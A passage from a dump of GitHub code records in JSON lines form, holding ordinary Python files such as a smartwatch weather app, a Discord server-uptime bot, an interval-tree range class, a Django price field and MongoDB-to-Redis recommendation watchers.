exit_btn.set_src(lv.btn.STATE.PRESSED,self.mainbar.get_exit_btn_dsc())\n exit_btn.set_src(lv.btn.STATE.CHECKED_RELEASED,self.mainbar.get_exit_btn_dsc())\n exit_btn.set_src(lv.btn.STATE.CHECKED_PRESSED,self.mainbar.get_exit_btn_dsc())\n exit_btn.align(self.weather_app_tile,lv.ALIGN.IN_BOTTOM_RIGHT, -10,-10)\n exit_btn.set_event_cb(self.exit_weather_app_event_cb)\n \n def enter_weather_app_event_cb(self,obj,evt):\n if evt == lv.EVENT.CLICKED:\n self.log.debug(\"enter_aclock_app_event_cb called\")\n self.statusbar.hide(True)\n # self.app.hide_indicator( example_app )\n self.mainbar.jump_to_tilenumber(self.tile_num, lv.ANIM.OFF )\n \n def exit_weather_app_event_cb(self,obj,evt):\n if evt == lv.EVENT.CLICKED:\n self.log.debug(\"exit_aclock_app_event_cb called\")\n self.statusbar.hide(False)\n self.mainbar.jump_to_maintile(lv.ANIM.OFF)\n \n def increment_day(self,obj,evt):\n if evt == lv.EVENT.CLICKED:\n self.log.debug(\"increment_day called\") \n if self.day_index == MAX_DAY:\n return\n self.day_index += 1\n if self.day_index == MAX_DAY:\n self.right_button.set_hidden(True)\n self.left_button.set_hidden(False)\n self.update_day_info() \n\n def decrement_day(self,obj,evt):\n if evt == lv.EVENT.CLICKED:\n self.log.debug(\"decrement_day called\") \n if self.day_index == 0:\n return\n self.day_index -= 1\n if self.day_index == 0:\n self.left_button.set_hidden(True)\n self.right_button.set_hidden(False)\n self.update_day_info()\n \n def update_day_info(self):\n self.log.debug(\"update_day_info to %d\"%self.day_index)\n self.date_label.set_text(self.date[self.day_index])\n key_list = list(self.icon_filename.keys())\n self.log.debug(key_list)\n index = key_list.index(self.weather_state_abbr[self.day_index])\n self.log.debug(\"index of %s: %d\"%(self.weather_state_abbr[self.day_index],index))\n self.icon.set_src(self.icon_dsc[index])\n \n self.state_label.set_text(self.weather_state_name[self.day_index])\n self.confidence_label.set_text(\"Confidence level: {}%\".format(self.predic[self.day_index]))\n self.temp_label.set_text(\"Temp: min: %3.1f°C, max: %3.1f°C\"%(self.min_temp[self.day_index],self.max_temp[self.day_index]))\n self.humidity_label.set_text(\"Humidity: {}%\".format(self.humid[self.day_index]))\n self.pressure_label.set_text(\"Air pressure: %d hPa\"%self.air_pressure[self.day_index])\n self.location_label.set_text(\"Location: \"+self.location)\n self.wind_label.set_text(\"Wind:\\nspeed: %5.1f kph\\ndir: %s\"%(self.wind_speed[self.day_index],\n self.wind_direction[self.day_index]))\n\n def add_widget(self):\n key_list = list(self.icon_filename.keys())\n self.log.debug(key_list)\n index = key_list.index(self.weather_state_abbr[0]) # today's weather icon\n self.log.debug(\"index of %s: %d\"%(self.weather_state_abbr[self.day_index],index))\n widget = self.widget.register(self.weather_state_name[self.day_index],self.icon_dsc[index],\n self.enter_weather_app_event_cb)\n","repo_name":"uraich/twatch2020_firmware","sub_path":"src/app/weather/metaweather_app.py","file_name":"metaweather_app.py","file_ext":"py","file_size_in_byte":14058,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"23593859008","text":"class Locke():\n\n\tdef __init__(self, capacity):\n\t\tif capacity < 1:\n\t\t\traise ValueError('Capacity must be greater than zero')\n\t\tself._capacity_ = capacity\n\n\n\tdef move_boats_through(self, number):\n\t\tif number > self._capacity_:\n\t\t\traise ValueError(\"Number of boat exceeds locke capacity {}\".format(self._capacity_))\n\t\telif number < 1:\n\t\t\traise ValueError('Boat number must be greater than zero')\n\n\n\tdef __enter__(self):\n\t\tprint(\"Stopping the pumps.\")\n\t\tprint(\"Opening the doors.\")\n\t\treturn self\n\n\tdef __exit__(self, exc_type, exc_val, exc_tb):\n\t\tprint(\"Closing the doors.\")\n\t\tprint(\"Restarting the pumps.\")\n\t\tif exc_type is not None:\n\t\t\tprint('__exit__({}, {}, {})'.format(exc_type, exc_val, exc_tb))\n\t\treturn True\n\nif __name__ == \"__main__\":\n\tprint('Here')\n\tsmall_locke = Locke(5)\n\tlarge_locke = Locke(10)\n\tboats = 8\n\n\t# Too many boats through a small locke will raise an exception\n\twith small_locke as locke:\n\t locke.move_boats_through(boats)\n\n\t# A lock with sufficient capacity can move boats without incident.\n\twith large_locke as locke:\n\t locke.move_boats_through(boats)\t\t\n","repo_name":"UWPCE-PythonCert-ClassRepos/Sp2018-Online","sub_path":"students/Zhengtang_Yang/lesson03/locke.py","file_name":"locke.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13040031527","text":"import socket\r\nimport time\r\nimport discord\r\nimport asyncio\r\nfrom discord.ext import commands\r\n\r\n# Unixタイムを取得する\r\ndef get_unix_time():\r\n unix_time = int(time.time())\r\n return unix_time\r\n\r\nunix = get_unix_time()\r\nprint(unix)\r\n\r\n\r\n# Discordのトークンを設定\r\nDISCORD_TOKEN = \"BOTTOKEN\"\r\n\r\n# 監視するホスト名またはIPアドレスとポート番号\r\nhost = \"192.168.3.100\"\r\nport = 8250\r\n\r\n# Discord Botを作成\r\nintents = discord.Intents.all()\r\nbot = commands.Bot(command_prefix='!', intents=intents)\r\n\r\n@bot.event\r\nasync def on_ready():\r\n print(\"ログインしました\")\r\n\r\n@bot.event\r\nasync def on_disconnect():\r\n print(\"切断しました\")\r\n\r\n# 監視対象のポートの状態を監視するタスク\r\nasync def port_check_task():\r\n last_state = None\r\n\r\n while True:\r\n state = await check_port_state()\r\n if state != last_state:\r\n last_state = state\r\n await send_discord_message(state)\r\n await asyncio.sleep(1)\r\n\r\n# ポートの状態をチェックする関数\r\nasync def check_port_state():\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n sock.settimeout(1)\r\n\r\n try:\r\n sock.connect((host, port))\r\n return f\" にサーバーが復旧しました。\"\r\n except socket.error:\r\n return f\" にサーバーがダウンしました。復旧までしばらくお待ち下さい。 @here\"\r\n finally:\r\n sock.close()\r\n\r\n# Discordにメッセージを送信する非同期関数\r\nasync def send_discord_message(msg):\r\n channel = bot.get_channel(channelid) # DiscordのチャンネルIDを設定してください\r\n await channel.send(msg)\r\n\r\n# ポートの状態を監視\r\n@bot.event\r\nasync def on_ready():\r\n bot.loop.create_task(port_check_task())\r\n\r\n# Discord Botを実行\r\nbot.run(DISCORD_TOKEN)\r\n","repo_name":"choko1229/MinecraftAliveMonitoring","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41526814016","text":"import scrapy\nimport boto3\nimport json\n\nclass CrawlRB(scrapy.Spider):\n\n name = 'recruiterbox'\n \n def start_requests(self):\n sqs = boto3.resource('sqs')\n queue = sqs.get_queue_by_name(QueueName='RECRUITER_BOX_SUB_DOMAINS')\n while True:\n # url = \n yield self.make_requests_from_url(\n str(json.loads(queue.receive_messages()[0].body).get('url'))\n )\n \n def parse(self, reponse):\n print(reponse)","repo_name":"masai-oss/joboid","sub_path":"job_collection/job_collection/spiders/recruiterbox.py","file_name":"recruiterbox.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8066353248","text":"#Basics\n\n#Assignacio \nvariable = 0; \nvariable = \"zero\"; \nvariable = False; \nvariable = '0'; \nvariable = 0.0; \nvariable = bytes; \n\n#Operacions: \n\n#Enters i Decimals (int / float o double) : \na = 5; \nb = 10; \n\nc = a*b; print (\">>>\" , c); \nc = a + b; print(\">>>\" , c); \na+= b; print(\">>>\",a); \nb*=a; print(\">>>\",b);\n\n#OJO DIVISIO\na/=b; print(\">>>\",a);#Enter\na = 15; \na = float(a)/b; print(\">>> \", a );#Decimal\n\n\n\n\n","repo_name":"Onnion191/TutorialsCustom","sub_path":"TutorialsCustom/TutorialsCustom.py","file_name":"TutorialsCustom.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22795036766","text":"from sys import stdin\ninput = stdin.readline\n\nif __name__ == \"__main__\":\n n = int(input())\n R,G,B = 0,1,2\n costs = [list(map(int,input().split())) for _ in range(n)]\n dp = [[0,0,0] for _ in range(n)] # i번째 집을 r, g, b로 칠했을 때 최소 누적 비용\n dp[0] = costs[0]\n for i in range(1,n):\n dp[i][R] = min(dp[i-1][G], dp[i-1][B]) + costs[i][R]\n dp[i][G] = min(dp[i-1][R], dp[i-1][B]) + costs[i][G]\n dp[i][B] = min(dp[i-1][R], dp[i-1][G]) + costs[i][B]\n print(min(dp[n-1]))","repo_name":"choieastsea/alg","sub_path":"acmipc/1149_RGB(DP)/1149.py","file_name":"1149.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28843956376","text":"from typing import List\r\n\r\nclass Node: \r\n\tdef __init__(self,data): \r\n\t\tself.left = None\r\n\t\tself.right = None\r\n\t\tself.range = data \r\n\r\nclass Ranges(object):\r\n\r\n\tdef __init__(self):\r\n\t\tself.tree = None\r\n\t\r\n\tdef _rangeCheck(self, start:int, end:int) -> bool:\r\n\t\t\"\"\"\r\n\t\tCheck if a given range is valid. It is a assumed that a valid range will have \r\n\t\tan initial value that is smaller than the end value. If both values are equal, \r\n\t\tit is not considered a valid range.\r\n\t\t:param start: Start of the range (inclusive)\r\n\t\t:param end: End of the range (exclusive)\r\n\t\t:return True if the range is valid False otherwise\r\n\t\t\"\"\"\r\n\t\treturn start < end\r\n\t\t\t\r\n\t\r\n\tdef display(self):\r\n\t\t\"\"\"\r\n\t\tDebugging function, displays the tree structure containing the stored ranges.\r\n\t\t\"\"\"\r\n\t\tdef displayTree(node:Node):\r\n\t\t\tif node:\r\n\t\t\t\tdisplayTree(node.left)\r\n\t\t\t\tprint(node.range)\r\n\t\t\t\tdisplayTree(node.right)\r\n\t\tprint(\"Displaying tree:\")\r\n\t\tdisplayTree(self.tree)\r\n\t\t\r\n\tdef _findIntersect(self, node:Node, start:int, end:int) -> (Node, Node, bool):\r\n\t\tparent = None\r\n\t\tisLeft = False\r\n\t\twhile node:\r\n\t\t\tif end <= node.range[0]:\r\n\t\t\t\tparent = node\r\n\t\t\t\tnode = node.left\r\n\t\t\t\tisLeft = True\r\n\t\t\telif start >= node.range[1]:\r\n\t\t\t\tparent = node\r\n\t\t\t\tnode = node.right\r\n\t\t\t\tisLeft = False\r\n\t\t\telse:\r\n\t\t\t\treturn (node, parent, isLeft)\r\n\t\tif not node:\r\n\t\t\treturn None\r\n\t\t\t\r\n\t\t\t\r\n###########################################################################\t\r\n\t\t\r\n\t\t\r\n\tdef get(self, start:int, end:int) -> List:\r\n\t\t\"\"\"\r\n\t\tReturns a list of ranges contained in the data that intersect with\r\n\t\t'start' and 'end'. Complexity O(log n), could be O(n) in the worst case.\r\n\t\t:param start: Start of the range (inclusive)\r\n\t\t:param end: End of the range (exclusive)\r\n\t\t:return List of ranges that intersect\r\n\t\t\"\"\"\r\n\t\tresults = []\r\n\t\tdef searchTree(node) -> List:\r\n\t\t\tif not node:\r\n\t\t\t\treturn None\r\n\t\t\tif end <= node.range[0]:\r\n\t\t\t\tsearchTree(node.left)\r\n\t\t\telif start >= node.range[1]:\r\n\t\t\t\tsearchTree(node.right)\r\n\t\t\telse:\r\n\t\t\t\tif start < node.range[0]:\r\n\t\t\t\t\tsearchTree(node.left)\r\n\t\t\t\tresults.append(node.range) \r\n\t\t\t\tif end > node.range[1]:\r\n\t\t\t\t\tsearchTree(node.right)\r\n\t\t\t\t\t\r\n\t\tif self._rangeCheck(start, end) and self.tree :\r\n\t\t\tx = self._findIntersect(self.tree, start, end)\r\n\t\t\tif x:\r\n\t\t\t\t(node, parent, isLeft) = x\r\n\t\t\t\tsearchTree(node)\t\r\n\t\treturn results\t\t\r\n\r\n\t\r\n###########################################################################\t\r\n\r\n\tdef add(self, start:int, end:int):\r\n\t\t\"\"\"\r\n\t\tAdds a new range into the data structure from 'start' to 'end'. \r\n\t\tInternally, it calls the inner function _addToTree.\r\n\t\t:param start: Start of the range (inclusive)\r\n\t\t:param end: End of the range (exclusive)\r\n\t\t\"\"\"\r\n\t\tif not self._rangeCheck(start, end):\r\n\t\t\treturn\r\n\t\tif not self.tree:\r\n\t\t\tself.tree = Node((start,end)) \r\n\t\telse :\r\n\t\t\tself._addToTree(self.tree, start, end)\r\n\t\r\n\tdef _addToTree(self, node:Node, start:int, end:int):\r\n\t\t\"\"\"\r\n\t\tThis function searches through the tree until it finds a range that \r\n\t\tintersects with the new range we want to add. Upon finding it, it \r\n\t\tcalls upon _leftMerge and/or _rightMerge to update the current node, \r\n\t\tas well as it's children and exits.\r\n\t\t:param node: Node containing the range we are evaluating.\r\n\t\t:param start: Start of the range (inclusive)\r\n\t\t:param end: End of the range (exclusive)\r\n\t\t\"\"\"\r\n\t\tdone = False\r\n\t\tmerge = False\r\n\t\twhile not done:\r\n\t\t\t# Check if new range is smaller than current range\r\n\t\t\tif end <= node.range[0] :\r\n\t\t\t\tif node.left:\r\n\t\t\t\t\tnode = node.left\r\n\t\t\t\telse:\r\n\t\t\t\t\tnode.left = Node((start,end))\r\n\t\t\t\t\tdone = True\r\n\t\t\t# Check if new range is larger than current range\r\n\t\t\telif start >= node.range[1]:\r\n\t\t\t\tif node.right:\r\n\t\t\t\t\tnode = node.right\r\n\t\t\t\telse:\r\n\t\t\t\t\tnode.right = Node((start,end))\r\n\t\t\t\t\tdone = True\r\n\t\t\t# New range intersects with current range\r\n\t\t\telse:\r\n\t\t\t\tmerge = True\r\n\t\t\t\tdone = True\r\n\t\tif merge:\r\n\t\t\tif start < node.range[0]:\r\n\t\t\t\tself._leftMerge(node, start, end)\r\n\t\t\tif end > node.range[1]:\r\n\t\t\t\tself._rightMerge(node, start, end)\r\n\t\t\t\t\r\n\t\r\n\t\r\n\tdef _leftMerge(self, node:Node, start:int, end:int):\r\n\t\t\"\"\"\r\n\t\tThis function updates the starting point of the range, and evaluates \r\n\t\tthe left side of the tree starting from 'node'. Average time complexity \r\n\t\tis O(log n). Can be to O(n) in case the tree degenerates into a list.\r\n\t\t:param node: Node containing the range we are evaluating.\r\n\t\t:param start: Start of the range (inclusive)\r\n\t\t:param end: End of the range (exclusive)\r\n\t\t\"\"\"\r\n\t\tmin = start \r\n\t\tprev = node\r\n\t\ttmp = node.left\r\n\t\tisLeftChild = True \r\n\t\twhile tmp :\r\n\t\t\tif min >= tmp.range[1]:\r\n\t\t\t\tprev = tmp\r\n\t\t\t\ttmp = tmp.right\r\n\t\t\t\tisLeftChild = False\r\n\t\t\telse:\r\n\t\t\t\tif min > tmp.range[0]:\r\n\t\t\t\t\tmin = tmp.range[0]\r\n\t\t\t\ttmp = tmp.left\r\n\t\t\t\tif isLeftChild:\r\n\t\t\t\t\tprev.left = tmp\r\n\t\t\t\telse:\r\n\t\t\t\t\tprev.right = tmp\r\n\t\tnode.range = (min,node.range[1])\r\n\t\t\r\n\t\t\r\n\tdef _rightMerge(self, node: Node, start:int, end:int):\r\n\t\t\"\"\"\r\n\t\tThis function updates the end point of the range, and evaluates the \r\n\t\tright side of the tree starting from \"node\". Complexity O(log n), \r\n\t\tcould be O(n) in the worst case. \r\n\t\t:param node: Node containing the range we are evaluating.\r\n\t\t:param start: Start of the range (inclusive)\r\n\t\t:param end: End of the range (exclusive)\r\n\t\t\"\"\"\r\n\t\tmax = end \r\n\t\tprev = node\r\n\t\ttmp = node.right\r\n\t\tisRightChild = True\r\n\t\twhile tmp:\r\n\t\t\tif max <= tmp.range[0]:\r\n\t\t\t\tprev = tmp\r\n\t\t\t\ttmp = tmp.left\r\n\t\t\t\tisRightChild = False\r\n\t\t\telse:\r\n\t\t\t\tif max < tmp.range[1]:\r\n\t\t\t\t\tmax = tmp.range[1]\r\n\t\t\t\ttmp = tmp.right\r\n\t\t\t\tif isRightChild:\r\n\t\t\t\t\tprev.right = tmp\r\n\t\t\t\telse:\r\n\t\t\t\t\tprev.left = tmp\r\n\t\tnode.range = (node.range[0], max)\r\n\r\n\r\n\r\n###########################################################################\t\t\r\n\tdef delete(self, start:int, end:int):\r\n\t\t\"\"\"\r\n\t\tDeletes the range from 'start' to 'end' from the data structure. Internally, \r\n\t\tit calls upon the inner function 'delete' which has an average time complexity\r\n\t\tO(log n); it could be O(n) in the worst case. \r\n\t\t:param start: Start of the range (inclusive)\r\n\t\t:param end: End of the range (exclusive)\r\n\t\t\"\"\"\r\n\t\tdef deleteFromTree(parent:Node, node:Node, isLeft:bool, start:int, end:int):\r\n\t\t\tif not node:\r\n\t\t\t\treturn\r\n\t\t\tif end <= node.range[0] :\r\n\t\t\t\tdeleteFromTree(node, node.left, True, start, end)\r\n\t\t\telif start >= node.range[1]:\r\n\t\t\t\tdeleteFromTree(node, node.right,False, start, end)\r\n\t\t\t# Intersects with deletion range\r\n\t\t\telse:\r\n\t\t\t\tnewLeft = None\r\n\t\t\t\tnewRight = None\r\n\t\t\t\t\r\n\t\t\t\tif start > node.range[0]: \r\n\t\t\t\t\tnewLeft = Node((node.range[0], start))\r\n\t\t\t\t\tnewLeft.left = node.left\r\n\t\t\t\telse:\r\n\t\t\t\t\tnewLeft = node.left\r\n\t\t\t\t\t\r\n\t\t\t\tif end < node.range[1]: \r\n\t\t\t\t\tnewRight = Node((end, node.range[1]))\r\n\t\t\t\t\tnewRight.right = node.right\r\n\t\t\t\telse:\r\n\t\t\t\t\tnewRight = node.right\r\n\t\t\t\t\t\r\n\t\t\t\tif newLeft:\r\n\t\t\t\t\ttmp = newLeft\r\n\t\t\t\t\twhile tmp.right:\r\n\t\t\t\t\t\ttmp = tmp.right\r\n\t\t\t\t\ttmp.right = newRight\r\n\t\t\t\telse:\r\n\t\t\t\t\tnewLeft = newRight\r\n\t\t\t\t\r\n\t\t\t\t# We are dealing with root (no parent)\r\n\t\t\t\tif not parent:\r\n\t\t\t\t\tself.tree = newLeft\r\n\t\t\t\t# Parent is not root\r\n\t\t\t\telse:\r\n\t\t\t\t\tif isLeft:\r\n\t\t\t\t\t\tparent.left = newLeft\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tparent.right = newLeft\r\n\t\t\t\tdeleteFromTree(parent, newLeft, isLeft, start, end)\r\n\r\n\t\r\n\t\tif self._rangeCheck(start, end) and self.tree:\t\t\t\r\n\t\t\tx = self._findIntersect(self.tree, start, end)\r\n\t\t\tif x:\r\n\t\t\t\t(node, parent, isLeft) = x\r\n\t\t\t\tdeleteFromTree(parent, node, isLeft, start, end)\t\r\n\r\n\t\t\r\n\r\n\t\t\r\n\t","repo_name":"serdaigle/ranges","sub_path":"range.py","file_name":"range.py","file_ext":"py","file_size_in_byte":7390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18314855125","text":"import csv\n\ndef parseData(file_to_open):\n points = {}\n with open(file_to_open) as f:\n for name, x, y in csv.reader(f, delimiter=\" \"):\n points[name] = (x,y)\n return points\n\nif __name__ == '__main__':\n parseData(\"data/pb005.txt\")\n","repo_name":"SylvainRamseyer/GeneticAlgo","sub_path":"DataParser.py","file_name":"DataParser.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26327326719","text":"import json\r\nfrom html.parser import HTMLParser\r\nimport json\r\n\r\n\r\nclass Parser(HTMLParser):\r\n lines = [\"\"]\r\n\r\n def handle_starttag(self, tag, attrs):\r\n pass\r\n\r\n def handle_endtag(self, tag):\r\n if tag != 'span':\r\n self.lines.append(\"\")\r\n\r\n def handle_data(self, data):\r\n self.lines[-1] += data + ' '\r\n\r\n\r\nif __name__ == \"__main__\":\r\n parser = Parser()\r\n filenumber = 25\r\n with open(f\"search_results/pages/{filenumber}.json\", encoding='utf8') as file:\r\n data = json.load(file)\r\n page_source = data['response']['result']['SourceD']\r\n page = parser.feed(page_source)\r\n for line in parser.lines:\r\n print(line)\r\n","repo_name":"LLinville/misc_code","sub_path":"Ian_Cyrillic/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23332641336","text":"from django.db import models\nfrom django.core.validators import RegexValidator\n\nclass PriceField(models.DecimalField):\n \n # Override the __init__ method to set some default arguments\n def __init__(self, *args, **kwargs):\n kwargs.setdefault(\"max_digits\", 10)\n kwargs.setdefault(\"decimal_places\", 2)\n kwargs.setdefault(\"blank\", True)\n kwargs.setdefault(\"null\", True)\n\n super().__init__(*args, **kwargs)\n\n # Override the pre_save method to calculate the price before saving\n def pre_save(self, model_instance, add):\n \"\"\"Calculate the price of a restaurant based on its reviews and other factors.\"\"\"\n\n # Get the reviews from the model instance\n size = model_instance.size\n\n # Define some constants for calculation\n BASE_PRICE = 10.0\n SIZE_FACTOR = {\"S\": 1.0, \"M\": 1.2, \"H\": 1.4}\n\n # Calculate the price based on the reviews and other factors\n price = BASE_PRICE * SIZE_FACTOR[size]\n\n # Round the price to two decimal places\n price = round(price, 2)\n\n # Set the price attribute of the model instance\n setattr(model_instance, self.attname, price)\n # Return the price value\n return price\n\n \n\nclass Restaurant(models.Model):\n name= models.CharField(max_length=100)\n address = models.CharField(max_length=200)\n PHONE_REGEX = r'^\\+?1?\\d{9,10}$'\n phone_validator = RegexValidator(regex=PHONE_REGEX, message=\"Phone number must be entered in the format: '+999999999'. Up to 10 digits allowed.\")\n phone = models.CharField(validators=[phone_validator], max_length=10, blank=True)\n \n CUISINE_CHOICES = [\n ('S',\"low\"),\n ('H',\"high\"),\n ('M',\"mdedium\")\n ]\n cuisine = models.CharField(max_length=1, choices=CUISINE_CHOICES) \n \n rating = models.FloatField(max_length=50)\n REVIEW_CHOICES = [\n ('S',\"low\"),\n ('H',\"high\"),\n ('M',\"mdedium\")\n ]\n reviews = models.CharField(max_length=1,choices=REVIEW_CHOICES)\n price = PriceField(blank=True, null=True)\n","repo_name":"shakkeelbhat/django-custom_model_fields","sub_path":"myproject/home/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3996173424","text":"import os\nimport redis\nimport concurrent.futures\nfrom dotenv import load_dotenv\nfrom pymongo import MongoClient\n\nload_dotenv()\n\nREDIS_PREFIX = os.getenv('REDIS_PREFIX', 'user:')\n\n# TODO: Remove duplicate vibes\n\ndef watchInsertVibes():\n \"\"\" Watch `vibes` collection \"\"\"\n try:\n print('Connecting to the PostgreSQL databse...')\n mongodbUrl = os.getenv('MONGODB_URL')\n client = MongoClient(mongodbUrl)\n #db = client.ahunbackup\n db = client.ahuntest\n\n # Redis conneciton\n print('Connecting to the Redis databse...')\n r = redis.Redis(host=os.getenv('REDIS_HOST'), port=os.getenv('REDIS_PORT'))\n except pymongo.errors.ServerSelectionTimeoutError as err:\n print(err)\n sys.exit(1)\n\n # Listen to mongodb changes\n while True:\n try:\n for insert_change in db['vibes'].watch(\n [{'$match': {'operationType': 'insert'}}]\n ):\n # Conains id of followers\n # In order to avoid placing vibe to the posters user vibe treat the current user as a follower\n followers = [ insert_change['fullDocument']['user'] ]\n # Append at the top of all followers\n # Get user's followers\n for f in db['useredges'].find({'destination': insert_change['fullDocument']['user']}):\n followers.append(f['source'])\n # Get follower activity type\n if db['users'].find({'_id': f['source'], 'interests': {'$in': insert_change['fullDocument'].get('activityType', [])}}).count() > 0:\n r.lpush(REDIS_PREFIX + str(f['source']) + ':recommended-high', str(insert_change['fullDocument']['_id']))\n else:\n r.lpush(REDIS_PREFIX + str(f['source']) + ':recommended-medium', str(insert_change['fullDocument']['_id']))\n\n for f in db['users'].find({'_id': {'$nin': followers}}):\n r.lpush(REDIS_PREFIX + str(f['_id']) + ':recommended-reserve', str(insert_change['fullDocument']['_id']))\n\n # TODO: add snapshot in order to restart from the previous watch \n except Exception as ex:\n # TODO: log the execption\n print(ex)\n\n\ndef watchDeleteVibes():\n \"\"\" Watch `vibes` collection deletation \"\"\"\n try:\n print('Connecting to the PostgreSQL databse...')\n mongodbUrl = os.getenv('MONGODB_URL')\n client = MongoClient(mongodbUrl)\n #db = client.ahunbackup\n db = client.ahuntest\n\n # Redis conneciton\n print('Connecting to the Redis databse...')\n r = redis.Redis(host=os.getenv('REDIS_HOST'), port=os.getenv('REDIS_PORT'))\n except pymongo.errors.ServerSelectionTimeoutError as err:\n print(err)\n sys.exit(1)\n\n while True:\n try:\n for delete_change in db['vibes'].watch(\n [{'$match': {'operationType': 'delete'}}]\n ):\n # Loop throught every user and try removing the vibe id\n for f in r.scan_iter(REDIS_PREFIX + '*'):\n r.lrem(f, 0, str(delete_change['documentKey']['_id']))\n\n # TODO: add snapshot in order to restart from the previous watch \n except Exception as ex:\n # TODO: log the execption\n print(ex)\n\n\ndef watchInsertUsers():\n \"\"\" Watch `users` collection and build recommendation for user \"\"\"\n try:\n print('Connecting to the PostgreSQL databse... Watch Insert users')\n mongodbUrl = os.getenv('MONGODB_URL')\n client = MongoClient(mongodbUrl)\n #db = client.ahunbackup\n db = client.ahuntest\n\n # Redis conneciton\n print('Connecting to the Redis databse... Watching Insert users')\n r = redis.Redis(host=os.getenv('REDIS_HOST'), port=os.getenv('REDIS_PORT'))\n except pymongo.errors.ServerSelectionTimeoutError as err:\n print(err)\n sys.exit(1)\n\n while True:\n try:\n for insert_change in db['users'].watch(\n [{'$match': {'operationType': 'insert'}}]\n ):\n # Calculate user's vibe recommendation\n # User's interests\n interests = [f for f in insert_change['fullDocument'].get('interests', [])]\n\n # Get non blocked following\n following = [f['_id'] for f in db['useredges'].find({'source': insert_change['fullDocument']['_id'], 'request': 'FOLLOW'})]\n\n # Get not-seen vibes from followed user's and that are also user's interests\n #vibes_followed_interests = [f['_id'] for f in db['vibes'].find({'_id': {'$nin': seen_vibes}, 'user': {'$in': following}, 'activityType': {'$in': interests}})]\n vibes_followed_interests = []\n\n for f in db['vibes'].find({'user': {'$in': following}, 'activityType': {'$in': interests}}):\n vibes_followed_interests.append(f['_id'])\n #r.lrem(str(user['_id']) + ':recommended-high', 0, str(f['_id']))\n r.lpush(REDIS_PREFIX + str(insert_change['fullDocument']['_id']) + ':recommended-high', str(f['_id']))\n\n # Get vibes that are based on users interests\n #vibes_interests = [f['_id'] for f in db['vibes'].find({'_id': {'$nin': seen_vibes + vibes_followed_interests + vibes_followed}, 'activityType': {'$in': interests}})]\n vibes_interests = []\n\n for f in db['vibes'].find({'_id': {'$nin': vibes_followed_interests}, 'activityType': {'$in': interests}}):\n vibes_interests.append(f['_id'])\n # TODO: Remove andy redundent data if found on redis\n r.lpush(REDIS_PREFIX + str(insert_change['fullDocument']['_id']) + ':recommended-medium', str(f['_id']))\n\n # # Get vibes that are not in interests\n #vibes_followed = [f['_id'] for f in db['vibes'].find({'_id': {'$nin': seen_vibes + vibes_followed_interests}, 'user': {'$in': following}})]\n vibes_followed = []\n\n for f in db['vibes'].find({'_id': {'$nin': vibes_followed_interests + vibes_interests}, 'user': {'$in': following}}):\n vibes_followed.append(f['_id'])\n # TODO: Remove andy redundent data if found on redis\n r.lpush(REDIS_PREFIX + str(insert_change['fullDocument']['_id']) + ':recommended-medium', str(f['_id']))\n\n # Reserved vibes\n #other_vibes = [f['_id'] for f in db['vibes'].find({'_id': {'$nin': seen_vibes + vibes_followed_interests + vibes_followed + vibes_interests}})]\n\n for f in db['vibes'].find({'_id': {'$nin': vibes_followed_interests + vibes_followed + vibes_interests}}):\n #r.lrem(str(user['_id']) + ':recommended-reserve', 0, str(f['_id']))\n r.lpush(REDIS_PREFIX + str(insert_change['fullDocument']['_id']) + ':recommended-reserve', str(f['_id']))\n\n except Exception as ex:\n # TODO: log the execption\n print(ex)\n\n\ndef watchUpdateUsers():\n \"\"\" watch `users` collection and re-build recommendation for user \"\"\"\n pass\n\n\ndef watchVibeseen():\n \"\"\" Watch `vibeseen` collection and remove vibe from redis \"\"\"\n while True:\n try:\n for insert_change in db['vibes'].watch(\n [{'$match': {'operationType': 'insert'}}]\n ):\n calculateVibeWeight(insert_change)\n except pymongo.errors.PyMongoError as ex:\n # TODO: log the execption\n print(ex)\n\ndef watchInsertUseredges():\n \"\"\" Watch `useredges` collection and build recommendation based on that \"\"\"\n try:\n print('Connecting to the PostgreSQL databse... Watch Insert users')\n mongodbUrl = os.getenv('MONGODB_URL')\n client = MongoClient(mongodbUrl)\n #db = client.ahunbackup\n db = client.ahuntest\n\n # Redis conneciton\n print('Connecting to the Redis databse... Watching Insert users')\n r = redis.Redis(host=os.getenv('REDIS_HOST'), port=os.getenv('REDIS_PORT'))\n except pymongo.errors.ServerSelectionTimeoutError as err:\n print(err)\n sys.exit(1)\n\n while True:\n try:\n for insert_change in db['useredges'].watch(\n [{'$match': {'operationType': 'insert'}}]\n ):\n seen_vibes = [v['_id'] for v in db['vibeseens'].find({'userId': insert_change['fullDocument']['source']})]\n user = db['users'].find_one({'_id': insert_change['fullDocument']['source']})\n \n # Get the followed user vibes\n for f in db['vibes'].find({'_id': {'$nin': seen_vibes}, 'user': insert_change['fullDocument']['destination']}):\n h = False\n # In case of the followed user's vibe is already recommended \n # remove the old recommendation and replicate with the new\n r.lrem(REDIS_PREFIX + str(user['_id']) + ':recommended-high', 0, str(f['_id']))\n r.lrem(REDIS_PREFIX + str(user['_id']) + ':recommended-medium', 0, str(f['_id']))\n r.lrem(REDIS_PREFIX + str(user['_id']) + 